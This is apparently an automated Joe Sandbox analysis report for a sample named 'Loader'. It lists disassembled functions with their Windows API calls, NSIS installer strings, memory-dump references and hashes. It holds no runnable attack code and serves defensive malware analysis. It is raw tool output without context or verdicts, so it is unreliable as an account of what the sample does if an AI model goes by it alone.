                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                                                                                                                                                                                                                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: Close$DeleteEnumOpen
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1912718029-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                                                                                                                                                                                                                                                Function 004022FD Relevance: 7.6, APIs: 5, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 0040230C
                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 0040232E
                                                                                                                                                                                                                                                                                                                • GetFileVersionInfoW.VERSION(?,?,?,00000000), ref: 00402347
                                                                                                                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,00409838,?,?,?,?,?,00000000), ref: 00402360
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402387
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 3376005127-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 30a9f30ffce614aff23d91e5a274339f7b18f56dfa2a9d4bf8bd5c228ca3d296
                                                                                                                                                                                                                                                                                                                • Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30a9f30ffce614aff23d91e5a274339f7b18f56dfa2a9d4bf8bd5c228ca3d296
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18
                                                                                                                                                                                                                                                                                                                Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDlgItem.USER32(?), ref: 004020A3
                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                                                                                                                                                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                • API String ID: 1849352358-0
                                                                                                                                                                                                                                                                                                                • Opcode ID: 5eded073d719063d7dd2b7ed0f4ab774b9adb8237686967b3f1148e91f7db3db
                                                                                                                                                                                                                                                                                                                • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5eded073d719063d7dd2b7ed0f4ab774b9adb8237686967b3f1148e91f7db3db
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                                                                                                                                                                                                                                                Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                                                                                                                                                                                                                • String ID: !
                                                                                                                                                                                                                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                                                                                                                                                                                                                • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                                                                                                                                                                                                                                                Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                                                                                                                                                                                                                                                • wsprintfW.USER32 ref: 00404483
                                                                                                                                                                                                                                                                                                                • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: %u.%u%s%s
                                                                                                                                                                                                                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                                                                                                                                                                                                                • Opcode ID: d07c36abb5cc3f5c488be6aff3aaa99d8dce3c6af4fcc367b11ea24b6a0b7be7
                                                                                                                                                                                                                                                                                                                • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d07c36abb5cc3f5c488be6aff3aaa99d8dce3c6af4fcc367b11ea24b6a0b7be7
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                                                                                                                                                                                                                                                Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                                                                                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                                                                                                                                                                                                                                                • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 1697273262-1764544995
                                                                                                                                                                                                                                                                                                                • Opcode ID: d23cd8c8fb9b260c3d1ef9fc8486076281a242565aede0b62d0bd991a5e4a72c
                                                                                                                                                                                                                                                                                                                • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d23cd8c8fb9b260c3d1ef9fc8486076281a242565aede0b62d0bd991a5e4a72c
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                                                                                                                                                                                                                                                Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32 ref: 004026B4
                                                                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: CopyFiles "%s"->"%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 2577523808-3778932970
                                                                                                                                                                                                                                                                                                                • Opcode ID: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                                                                                                                                                                                                                                                                                • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 76b1160061a8bcde82d673e25faa9719cd8acd17af1c4b15f649e1f749d05235
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                                                                                                                                                                                                                                                Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: lstrcatwsprintf
                                                                                                                                                                                                                                                                                                                • String ID: %02x%c$...
                                                                                                                                                                                                                                                                                                                • API String ID: 3065427908-1057055748
                                                                                                                                                                                                                                                                                                                • Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                                • Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794
                                                                                                                                                                                                                                                                                                                Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 00405083
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                • OleUninitialize.OLE32(00000404,00000000), ref: 004050D1
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory("C:\Users\user\AppData\Local\Temp\nscB629.tmp\"),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224698971.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224726858.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224935191.0000000000560000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_Loader.jbxd
                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                • String ID: Section: "%s"$Skipping section: "%s"
                                                                                                                                                                                                                                                                                                                • API String ID: 2266616436-4211696005
                                                                                                                                                                                                                                                                                                                • Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                                • Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD
                                                                                                                                                                                                                                                                                                                Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                • GetDC.USER32(?), ref: 00402100
                                                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B20B,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                                                • CreateFontIndirectW.GDI32(00420110), ref: 0040216A
                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2224660340.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2224535606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
